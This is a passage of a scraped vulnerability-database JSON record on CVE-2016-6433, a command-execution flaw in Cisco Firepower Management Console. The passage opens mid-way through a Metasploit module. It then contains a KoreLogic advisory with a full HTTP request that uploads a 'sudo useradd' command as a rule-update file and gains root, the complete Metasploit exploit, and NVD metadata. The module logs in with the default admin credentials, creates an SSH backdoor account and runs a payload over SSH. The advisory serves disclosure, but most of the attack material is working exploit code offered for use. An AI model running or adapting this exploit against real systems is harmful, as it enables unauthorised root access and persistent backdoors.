=> '1' }, \n}) \nend \n \ndef generate_new_username \ndatastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) \nend \n \ndef generate_new_password \ndatastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) \nend \n \ndef report_cred(opts) \nservice_data = { \naddress: rhost, \nport: rport, \nservice_name: 'cisco', \nprotocol: 'tcp', \nworkspace_id: myworkspace_id \n} \n \ncredential_data = { \norigin_type: :service, \nmodule_fullname: fullname, \nusername: opts[:user], \nprivate_data: opts[:password], \nprivate_type: :password \n}.merge(service_data) \n \nlogin_data = { \nlast_attempted_at: DateTime.now, \ncore: create_credential(credential_data), \nstatus: Metasploit::Model::Login::Status::SUCCESSFUL, \nproof: opts[:proof] \n}.merge(service_data) \n \ncreate_credential_login(login_data) \nend \n \ndef do_login \nconsole_user = datastore['USERNAME'] \nconsole_pass = datastore['PASSWORD'] \nuri = normalize_uri(target_uri.path, 'login.cgi') \n \nprint_status(\"Attempting to login in as #{console_user}:#{console_pass}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'vars_post' => { \n'username' => console_user, \n'password' => console_pass, \n'target' => '' \n} \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Connection timed out while trying to log in.') \nend \n \nres_cookie = res.get_cookies \nif res.code == 302 && res_cookie.include?('CGISESSID') \ncgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first \nprint_status(\"CGI Session ID: #{cgi_sid}\") \nprint_good(\"Authenticated as #{console_user}:#{console_pass}\") \nreport_cred(username: console_user, password: console_pass) \nreturn cgi_sid \nend \n \nnil \nend \n \ndef execute_command(cmd, opts = {}) \n@first_exec = true \ncmd.gsub!(/\\/tmp/, '/usr/tmp') \n \n# Weird hack for the cmd stager. \n# Because it keeps using > to write the payload. 
\nif @first_exec \n@first_exec = false \nelse \ncmd.gsub!(/>>/, ' > ') \nend \n \nbegin \nTimeout.timeout(3) do \n@ssh_socket.exec!(\"#{cmd}\\n\") \nvprint_status(\"Executing #{cmd}\") \nend \nrescue Timeout::Error \nfail_with(Failure::Unknown, 'SSH command timed out') \nrescue Net::SSH::ChannelOpenFailed \nprint_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') \nretry \nend \nend \n \ndef init_ssh_session(user, pass) \nprint_status(\"Attempting to log into SSH as #{user}:#{pass}\") \n \nfactory = ssh_socket_factory \nopts = { \nauth_methods: ['password', 'keyboard-interactive'], \nport: datastore['SSHPORT'], \nuse_agent: false, \nconfig: false, \npassword: pass, \nproxy: factory, \nnon_interactive: true \n} \n \nopts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] \n \nbegin \nssh = nil \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \n@ssh_socket = Net::SSH.start(rhost, user, opts) \nend \nrescue Net::SSH::Exception => e \nfail_with(Failure::Unknown, e.message) \nend \nend \n \ndef exploit \n# To exploit the useradd vuln, we need to login first. 
\nsid = do_login \nreturn unless sid \n \n# After login, we can call the useradd utility to create a backdoor user \nnew_user = generate_new_username \nnew_pass = generate_new_password \ncreate_ssh_backdoor(sid, new_user, new_pass) \n \n# Log into the SSH backdoor account \ninit_ssh_session(new_user, new_pass) \n \nbegin \nexecute_cmdstager({:linemax => 500}) \nensure \n@ssh_socket.close \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140467/cisco_firepower_useradd.rb.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:16", "description": "", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Threat Management Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "PACKETSTORM:138988", "href": "https://packetstormsecurity.com/files/138988/Cisco-Firepower-Threat-Management-Command-Execution.html", "sourceData": "`KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command \nExecution Leading to Root Access \n \nTitle: Cisco Firepower Threat Management Console Remote Command Execution \nLeading to Root Access \nAdvisory ID: KL-001-2016-007 \nPublication Date: 2016.10.05 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Cisco \nAffected Product: Firepower Threat Management Console \nAffected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) \nPlatform: Embedded Linux \nCWE Classification: CWE-434: Unrestricted Upload of File with Dangerous \nType, CWE-94: Improper Control of Generation of Code \nImpact: Arbitrary Code Execution \nAttack vector: HTTP \nCVE-ID: CVE-2016-6433 \n \n2. 
Vulnerability Description \n \nAn authenticated user can run arbitrary system commands as \nthe www user which leads to root. \n \n3. Technical Description \n \nA valid session and CSRF token is required. The webserver runs as \na non-root user which is permitted to sudo commands as root with \nno password. \n \nPOST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1 \nHost: 1.3.3.7 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) \nGecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nDNT: 1 \nCookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6 \nConnection: close \nContent-Type: multipart/form-data; \nboundary=---------------------------15519792567789791301241925798 \nContent-Length: 813 \n \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"manual_update\" \n \n1 \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"source\" \n \nfile \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"file\"; \nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\" \nContent-Type: application/octet-stream \n \nsudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"action_submit\" \n \nImport \n-----------------------------15519792567789791301241925798 \nContent-Disposition: form-data; name=\"sf_action_id\" \n \n8c6059ae8dbedc089877b16b7be2ae7f \n-----------------------------15519792567789791301241925798-- \n \n \nHTTP/1.1 200 OK \nDate: Sat, 23 Apr 2016 13:38:01 GMT \nServer: Apache \nVary: Accept-Encoding \nX-Frame-Options: SAMEORIGIN \nContent-Length: 49998 \nConnection: close \nContent-Type: text/html; charset=utf-8 \n \n... 
\n \n$ ssh korelogic@1.3.3.7 \nPassword: \n \nCopyright 2004-2016, Cisco and/or its affiliates. All rights reserved. \nCisco is a registered trademark of Cisco Systems, Inc. \nAll other trademarks are property of their respective owners. \n \nCisco Fire Linux OS v6.0.1 (build 37) \nCisco Firepower Management Center for VMWare v6.0.1 (build 1213) \n \nCould not chdir to home directory /Volume/home/korelogic: No such file or \ndirectory \nkorelogic@firepower:/$ sudo su - \nPassword: \nroot@firepower:~# \n \n4. Mitigation and Remediation Recommendation \n \nThe vendor has acknowledged this vulnerability but has \nnot issued a fix. Vendor acknowledgement available at: \n \nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2 \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin (@thatguylevel) of \nKoreLogic, Inc. \n \n6. Disclosure Timeline \n \n2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. \n2016.06.30 - Cisco acknowledges receipt of vulnerability report. \n2016.07.20 - KoreLogic and Cisco discuss remediation timeline for \nthis vulnerability and for 3 others reported in the \nsame product. \n2016.08.12 - 30 business days have elapsed since the vulnerability was \nreported to Cisco. \n2016.09.02 - 45 business days have elapsed since the vulnerability was \nreported to Cisco. \n2016.09.09 - KoreLogic asks for an update on the status of the \nremediation efforts. \n2016.09.15 - Cisco confirms remediation is underway and soon to be \ncompleted. \n2016.09.28 - Cisco informs KoreLogic that the acknowledgement details \nwill be released publicly on 2016.10.05. \n2016.10.05 - Public disclosure. \n \n7. Proof of Concept \n \nSee Technical Description \n \n \nThe contents of this advisory are copyright(c) 2016 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. 
is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/138988/KL-001-2016-007.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-10T11:32:00", "description": "This Metasploit module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. 
Authentication is required to exploit this vulnerability.", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "zdt", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "1337DAY-ID-26656", "href": "https://0day.today/exploit/description/26656", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # 
admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. 
So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def 
generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = 
false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/26656", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T14:55:07", "description": "The Threat Management Console in Cisco Firepower Management Center 5.2.0 through 6.0.1 allows remote authenticated users to execute arbitrary 
commands via crafted web-application parameters, aka Bug ID CSCva30872.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-06T10:59:00", "type": "cve", "title": "CVE-2016-6433", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2021-01-05T17:39:00", "cpe": ["cpe:/a:cisco:firepower_management_center:5.4.1.5", "cpe:/a:cisco:firepower_management_center:5.2.0", "cpe:/a:cisco:firepower_management_center:5.4.1.3", "cpe:/a:cisco:firepower_management_center:5.3.0.3", "cpe:/a:cisco:firepower_management_center:5.4.1.6", "cpe:/a:cisco:firepower_management_center:5.4.1.4", "cpe:/a:cisco:firepower_management_center:5.4.1", "cpe:/a:cisco:firepower_management_center:5.4.0.2", "cpe:/a:cisco:firepower_management_center:5.3.1.4", "cpe:/a:cisco:firepower_management_center:5.3.0.2", "cpe:/a:cisco:firepower_management_center:5.4.1.2", "cpe:/a:cisco:firepower_management_center:5.3.1.5", "cpe:/a:cisco:firepower_management_center:5.3.0", "cpe:/a:cisco:firepower_management_center:5.3.1", "cpe:/a:cisco:firepower_management_center:6.0.1", "cpe:/a:cisco:firepower_management_center:5.3.1.3", 
"cpe:/a:cisco:firepower_management_center:5.4.0", "cpe:/a:cisco:firepower_management_center:5.4.1.1", "cpe:/a:cisco:firepower_management_center:5.3.0.4", "cpe:/a:cisco:firepower_management_center:5.3.1.6"], "id": "CVE-2016-6433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6433", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cisco:firepower_management_center:5.4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_management_center:5.3.1.3:*:*:*:*:*:*:*"]}], "korelogic": [{"lastseen": "2021-12-15T01:42:57", "description": "1. 
Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data; boundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\"; filename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: 
form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or directory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.\n\n6. 
Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. Proof of Concept\n\n See Technical Description", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "korelogic", "title": "Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": 
"2016-10-05T00:00:00", "id": "KL-001-2016-007", "href": "https://korelogic.com/Resources/Advisories/KL-001-2016-007.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T08:19:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "exploitdb", "title": "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", 